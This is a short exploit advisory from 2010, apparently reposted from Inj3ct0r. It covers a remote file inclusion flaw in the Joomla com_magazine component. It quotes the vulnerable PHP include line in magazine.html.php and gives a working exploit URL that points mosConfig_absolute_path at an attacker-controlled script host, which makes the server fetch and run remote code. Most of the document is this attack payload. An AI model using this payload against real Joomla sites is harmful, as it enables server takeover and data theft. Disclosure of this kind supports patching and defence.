Home / os / winme

Joomla Component com_magazine Remote File Include Vulnerabil

Posted on 30 March 2010

===============================================================
Joomla Component com_magazine Remote File Include Vulnerability
===============================================================


     o    o /  _ o        __|     /    |__         o _   o /   o
    /|    |     /   __o   o    |    o/    o/__   /     |    /|
    /    /    |   /) |    (   /o  / )    |  (  / |   /    / 

      Discovered by: Febronio - febronio[at]linuxmail.org


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Vulnerable File:

* magazine.html.php

global $mosConfig_absolute_path;
require_once($mosConfig_absolute_path."/administrator/components/com_magazine/utf8/utf8.php");

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:

http://target/administrator/components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://evil_script?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


# Inj3ct0r.com [2010-03-30]

 

TOP